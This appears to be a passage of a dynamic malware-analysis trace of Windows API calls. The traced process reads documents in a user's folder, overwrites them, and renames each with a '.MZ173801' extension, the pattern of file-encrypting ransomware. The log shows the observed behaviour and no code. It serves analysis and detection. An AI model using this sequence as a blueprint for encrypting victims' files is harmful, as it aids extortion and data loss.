[0121.534] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xc4ac [0121.535] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.535] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xc4ac, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xc4ac, lpOverlapped=0x0) returned 1 [0121.536] CloseHandle (hObject=0x3fc) returned 1 [0121.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fnu1ZEKDFkx.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fnu1zekdfkx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.538] WriteFile (in: hFile=0x3fc, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xc4ac, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xc4ac, lpOverlapped=0x0) returned 1 [0121.539] CloseHandle (hObject=0x3fc) returned 1 [0121.541] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fnu1ZEKDFkx.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fnu1zekdfkx.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fnu1ZEKDFkx.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fnu1zekdfkx.docx.mz173801")) returned 1 [0121.542] GetCurrentThreadId () returned 0x1358 [0121.542] GetCurrentThreadId () returned 0x1358 [0121.542] GetCurrentThreadId () returned 0x1358 [0121.542] GetCurrentThreadId () returned 0x1358 [0121.542] GetCurrentThreadId () returned 0x1358 [0121.542] GetCurrentThreadId () returned 0x1358 [0121.542] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bbe220, ftCreationTime.dwHighDateTime=0x1d5e9a6, ftLastAccessTime.dwLowDateTime=0x6fe7cd20, ftLastAccessTime.dwHighDateTime=0x1d5e495, ftLastWriteTime.dwLowDateTime=0x6fe7cd20, ftLastWriteTime.dwHighDateTime=0x1d5e495, nFileSizeHigh=0x0, nFileSizeLow=0x1a9e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="IQVV x.doc", cAlternateFileName="IQVVX~1.DOC")) returned 1 [0121.542] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.542] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.542] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\IQVV x.doc" (normalized: "c:\\users\\fd1hvy\\documents\\iqvv x.doc"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bbe220, ftCreationTime.dwHighDateTime=0x1d5e9a6, ftLastAccessTime.dwLowDateTime=0x6fe7cd20, ftLastAccessTime.dwHighDateTime=0x1d5e495, ftLastWriteTime.dwLowDateTime=0x6fe7cd20, ftLastWriteTime.dwHighDateTime=0x1d5e495, nFileSizeHigh=0x0, nFileSizeLow=0x1a9e)) returned 1 [0121.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.543] GetCurrentThreadId () returned 0x1358 [0121.543] GetCurrentThreadId () returned 0x1358 [0121.543] GetCurrentThreadId () returned 0x1358 [0121.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.543] GetCurrentThreadId () returned 0x1358 [0121.543] GetCurrentThreadId () returned 0x1358 [0121.543] GetCurrentThreadId () returned 0x1358 [0121.544] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\IQVV x.doc" (normalized: "c:\\users\\fd1hvy\\documents\\iqvv x.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.544] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.544] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.544] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1a9e [0121.544] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.544] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1a9e, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1a9e, lpOverlapped=0x0) returned 1 [0121.545] CloseHandle (hObject=0x3fc) returned 1 [0121.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\IQVV x.doc" (normalized: "c:\\users\\fd1hvy\\documents\\iqvv x.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.546] WriteFile (in: hFile=0x3fc, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1a9e, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x1a9e, lpOverlapped=0x0) returned 1 [0121.547] CloseHandle (hObject=0x3fc) returned 1 [0121.548] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\IQVV x.doc" (normalized: "c:\\users\\fd1hvy\\documents\\iqvv x.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\IQVV x.doc.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\iqvv x.doc.mz173801")) returned 1 [0121.548] GetCurrentThreadId () returned 0x1358 [0121.548] GetCurrentThreadId () returned 0x1358 [0121.548] GetCurrentThreadId () returned 0x1358 [0121.548] GetCurrentThreadId () returned 0x1358 [0121.548] GetCurrentThreadId () returned 0x1358 [0121.548] GetCurrentThreadId () returned 0x1358 [0121.548] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3117c0, ftCreationTime.dwHighDateTime=0x1d5b153, ftLastAccessTime.dwLowDateTime=0x6fc85150, ftLastAccessTime.dwHighDateTime=0x1d5d349, ftLastWriteTime.dwLowDateTime=0x6fc85150, ftLastWriteTime.dwHighDateTime=0x1d5d349, nFileSizeHigh=0x0, nFileSizeLow=0x86d4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="I_TP.docx", cAlternateFileName="I_TP~1.DOC")) returned 1 [0121.548] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.548] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.548] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\I_TP.docx" (normalized: "c:\\users\\fd1hvy\\documents\\i_tp.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3117c0, ftCreationTime.dwHighDateTime=0x1d5b153, ftLastAccessTime.dwLowDateTime=0x6fc85150, ftLastAccessTime.dwHighDateTime=0x1d5d349, ftLastWriteTime.dwLowDateTime=0x6fc85150, ftLastWriteTime.dwHighDateTime=0x1d5d349, nFileSizeHigh=0x0, nFileSizeLow=0x86d4)) returned 1 [0121.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.549] GetCurrentThreadId () returned 0x1358 [0121.549] GetCurrentThreadId () returned 0x1358 [0121.549] GetCurrentThreadId () returned 0x1358 [0121.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 